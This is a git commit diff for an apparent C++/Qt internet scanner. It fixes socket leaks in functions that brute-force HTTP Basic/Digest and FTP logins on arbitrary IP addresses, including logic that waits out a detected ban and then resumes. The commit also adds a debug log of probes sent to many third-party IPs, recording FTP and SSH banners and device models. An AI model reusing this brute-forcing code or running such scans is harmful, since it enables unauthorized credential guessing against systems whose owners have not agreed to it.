Фикс утечек

This commit is contained in:
cora32 2014-11-25 07:51:55 +03:00
parent 575a1c5b79
commit 458113bc6c
2 changed files with 245 additions and 43 deletions

View File

@ -363,6 +363,7 @@ char *_makeDigestResponse(
CvtHex(response, responseMD5); CvtHex(response, responseMD5);
return (char*)responseMD5; return (char*)responseMD5;
}; };
lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method) lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
{ {
if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: <a style=\"color: #efe100;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "\">" + QString(ip) + ":" + QString::number(port) + + "</a>"); if(strcmp(method, "[DIGEST]") != 0 && strcmp(method, "[NORMAL]") != 0) stt->doEmitionRedFoundData("[-] Unknown method IP: <a style=\"color: #efe100;\" href=\"http://" + QString(ip) + ":" + QString::number(port) + "\">" + QString(ip) + ":" + QString::number(port) + + "</a>");
@ -403,10 +404,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
if(port == 443) if(port == 443)
{ {
ZeroMemory(headerMsg, REQUEST_MAX_SIZE); ZeroMemory(headerMsg, REQUEST_MAX_SIZE);
// while(baSSLLocked) Sleep(200);
// baSSLLocked = true;
_baSSLWorker(ip, hRqst, headerMsg); _baSSLWorker(ip, hRqst, headerMsg);
// baSSLLocked = false;
} }
#pragma endregion #pragma endregion
else else
@ -434,7 +432,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
return lps; return lps;
}; };
#endif #endif
SOCKET sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
send(sock, hRqst, strlen(hRqst), 0); send(sock, hRqst, strlen(hRqst), 0);
@ -444,7 +442,7 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
int xx = 0; int xx = 0;
while(xx < 512) while(xx < 512)
{ {
x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 10, &bTO); x = recvWT(sock, hMsgR, sizeof(hMsgR), gTimeOut + 5, &bTO);
if(x <= 0) break; if(x <= 0) break;
strncat(headerMsg, hMsgR, x); strncat(headerMsg, hMsgR, x);
xx += x; xx += x;
@ -453,6 +451,9 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg)); if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(headerMsg));
}; };
#pragma endregion #pragma endregion
CSSOCKET(sock);
if(strlen(headerMsg) == 0) if(strlen(headerMsg) == 0)
{ {
isActive = 0; isActive = 0;
@ -469,8 +470,6 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
{ {
if(strstri(headerMsg, "400 Bad") != NULL) if(strstri(headerMsg, "400 Bad") != NULL)
{ {
CSSOCKET(sock);
strcpy(lps.other, "[400 Bad Request]"); strcpy(lps.other, "[400 Bad Request]");
isActive = 0; isActive = 0;
return lps; return lps;
@ -490,8 +489,6 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
} }
else else
{ {
CSSOCKET(sock);
strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data()); strcpy(lps.other, QString("[404 Not Found (" + QString(path) + ")]").toLocal8Bit().data());
isActive = 0; isActive = 0;
return lps; return lps;
@ -514,16 +511,12 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
if(goon == false) if(goon == false)
{ {
CSSOCKET(sock);
strcpy(lps.login, "NULL"); strcpy(lps.login, "NULL");
strcpy(lps.pass, "NULL"); strcpy(lps.pass, "NULL");
isActive = 0; isActive = 0;
return lps; return lps;
}; };
}; };
CSSOCKET(sock);
#pragma endregion #pragma endregion
isActive = 1; isActive = 1;
@ -653,15 +646,13 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
{ {
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
cErrCode = WSAGetLastError();
while(cErrCode == 10038) while(WSAGetLastError() == 10038)
{ {
if(gDebugMode) stt->doEmitionDebugFoundData("[BA] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]"); if(gDebugMode) stt->doEmitionDebugFoundData("[BA] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]");
CSSOCKET(sock); CSSOCKET(sock);
sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)); cCode = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
cErrCode = WSAGetLastError();
}; };
if(cCode != SOCKET_ERROR) if(cCode != SOCKET_ERROR)
{ {
@ -709,7 +700,6 @@ lopaStr _BABrute(char *cookie, char *ip, int port, char *pathT, char *method)
strcpy(lps.login, "UNKNOWN"); strcpy(lps.login, "UNKNOWN");
return lps; return lps;
}; };
CSSOCKET(sock); CSSOCKET(sock);
}; };
#pragma endregion #pragma endregion
@ -845,6 +835,7 @@ lopaStr Connector::_BALobby(char *cookie, char *ip, int port, char *path, char *
return res; return res;
}; };
lopaStr _FTPBrute(char *ip, int port, PathStr *ps) lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
{ {
lopaStr lps; lopaStr lps;
@ -896,15 +887,13 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
closedSocket = 0; closedSocket = 0;
sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
int cErrCode = WSAGetLastError();
while(cErrCode == 10038) while(WSAGetLastError() == 10038)
{ {
if(gDebugMode) stt->doEmitionDebugFoundData("[FTP] 10038 occured -- [" + QString(ip) + ":" + QString::number(port) + "]"); if(gDebugMode) stt->doEmitionDebugFoundData("[FTP] 10038 occured - [" + QString(ip) + ":" + QString::number(port) + "]");
CSSOCKET(sockFTP); CSSOCKET(sockFTP);
sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); sockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); connectionResult = connect(sockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
cErrCode = WSAGetLastError();
}; };
loginFailedFlag = 0; loginFailedFlag = 0;
}; };
@ -925,8 +914,7 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
Activity += x; Activity += x;
closedSocket = 0; closedSocket = 0;
if(strstr(recvBuff, "451 The parameter is incorrect") != NULL if(strstr(recvBuff, "451 The parameter is incorrect") != NULL)
)
{ {
CSSOCKET(sockFTP); CSSOCKET(sockFTP);
isActive = 0; isActive = 0;
@ -979,26 +967,17 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
) )
{ {
j = 0; j = 0;
CSSOCKET(sockFTP);
closedSocket = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
}; };
if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL) if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL)
{ {
CSSOCKET(sockFTP);
closedSocket = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
}; };
if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL) if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL)
{ {
++i; ++i;
CSSOCKET(sockFTP);
closedSocket = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
}; };
@ -1009,10 +988,7 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
|| strstr(recvBuff, "from this IP") != NULL || strstr(recvBuff, "from this IP") != NULL
|| strstr(recvBuff, "from your IP") != NULL) || strstr(recvBuff, "from your IP") != NULL)
{ {
#pragma region QTGUI_Area
stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")"); stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")");
#pragma endregion
CSSOCKET(sockFTP);
closedSocket = 1; closedSocket = 1;
if(j > 0) --j; if(j > 0) --j;
ZeroMemory(recvBuff, sizeof(recvBuff)); ZeroMemory(recvBuff, sizeof(recvBuff));
@ -1026,7 +1002,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
else else
{ {
loginFailedFlag = 1; loginFailedFlag = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
}; };
strcat(request, "\r\n"); strcat(request, "\r\n");
@ -1048,7 +1023,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
) )
{ {
loginFailedFlag = 1; loginFailedFlag = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
} }
else if(strstr(recvBuff, "331") != NULL) else if(strstr(recvBuff, "331") != NULL)
@ -1072,7 +1046,6 @@ lopaStr _FTPBrute(char *ip, int port, PathStr *ps)
else else
{ {
loginFailedFlag = 1; loginFailedFlag = 1;
ZeroMemory(recvBuff, sizeof(recvBuff));
break; break;
}; };
strcat(request, "\r\n"); strcat(request, "\r\n");
@ -1282,6 +1255,7 @@ lopaStr Connector::_FTPLobby(char *ip, int port, PathStr *ps)
return lps; return lps;
}; };
int _sslConnectTo(char *iph, int porth, char *requesth, conSTR *CSTR) int _sslConnectTo(char *iph, int porth, char *requesth, conSTR *CSTR)
{ {
SSL *ssl = NULL; SSL *ssl = NULL;
@ -1510,15 +1484,16 @@ int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *C
FD_SET(sock, &read_fs); FD_SET(sock, &read_fs);
timeval tv = { gTimeOut, 0 }; timeval tv = { gTimeOut, 0 };
iResult = select(sock + 1, NULL, &read_fs, NULL, &tv); int oldErr = WSAGetLastError();
iResult = select(sock + 1, &read_fs, NULL, NULL, &tv);
if (iResult == SOCKET_ERROR) if (iResult == SOCKET_ERROR)
{ {
++offlines; ++offlines;
stt->doEmitionRedFoundData("[Omitting IP] Select error-" + stt->doEmitionRedFoundData("[Omitting IP] Select error-" +
QString::number(WSAGetLastError()) + QString::number(WSAGetLastError()) + " oldErr:" + QString::number(oldErr) +
" - " + QString(ip) + ":" + QString::number(port)); " sock:" + QString::number(sock) + " -" + QString(ip) + ":" + QString::number(port));
} }
else else
{ {

227
debugData.txt Normal file
View File

@ -0,0 +1,227 @@
==========================
SSH-2.0-dropbear_0.48
==========================
==========================
GET / HTTP/1.1
Host: 222.2.124.6:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220-MegaBit Gear TE4121C FTP server ready
220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003)
530 USER and PASS required
530 USER and PASS required
==========================
==========================
GET / HTTP/1.1
Host: 222.2.124.25:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 (vsFTPd 1.2.0)
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
530 Please login with USER and PASS.
==========================
==========================
GET / HTTP/1.1
Host: 222.2.124.44:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220-MegaBit Gear TE4121C FTP server ready
220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003)
530 USER and PASS required
530 USER and PASS required
==========================
==========================
GET / HTTP/1.1
Host: 222.2.124.65:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220-MegaBit Gear TE4121C FTP server ready
220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003)
530 USER and PASS required
530 USER and PASS required
==========================
==========================
GET / HTTP/1.1
Host: 222.2.124.200:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220-MegaBit Gear TE4121C FTP server ready
220 FTE4121_0113C (Tue Jan 14 18:20:09 JST 2003)
530 USER and PASS required
530 USER and PASS required
==========================
==========================
GET / HTTP/1.1
Host: 222.2.144.207:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 Simple FTPd welcomes you.
==========================
==========================
GET / HTTP/1.1
Host: 222.2.147.250:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 FTP server ready.
500 'GET' command not understood.
==========================
==========================
==========================
SSH-2.0-dropbear
==========================
==========================
==========================
SSH-2.0-dropbear
==========================
==========================
GET / HTTP/1.1
Host: 222.2.175.116:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 FTP server ready.
500 'GET' command not understood.
==========================
==========================
GET / HTTP/1.1
Host: 222.2.175.94:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 Simple FTPd welcomes you.
==========================
==========================
GET / HTTP/1.1
Host: 222.2.189.106:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 Simple FTPd welcomes you.
==========================
==========================
==========================
SSH-2.0-OpenSSH_6.6p1-hpn14v4
==========================
==========================
GET / HTTP/1.1
Host: 222.3.13.167:21
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: us-US,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: text, identity, *;q=0
User-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Connection: close
==========================
220 ibs-soho FTP server (Version 6.4/OpenBSD/Linux-ftpd-0.17) ready.
500 'GET / HTTP/1.1': command not understood.
500 'HOST: 222.3.13.167:21': command not understood.
500 'ACCEPT: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1': command not understood.
500 'ACCEPT-LANGUAGE: us-US,ru;q=0.9,en;q=0.8': command not understood.
500 'ACCEPT-CHARSET: iso-8859-1, utf-8, utf-16, *;q=0.1': command not understood.
500 'ACCEPT-ENCODING: text, identity, *;q=0': command not understood.
500 'USER-AGENT: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11': command not understood.
500 'CONNECTION: close': command not understood.
500 '': command not understood.
==========================
==========================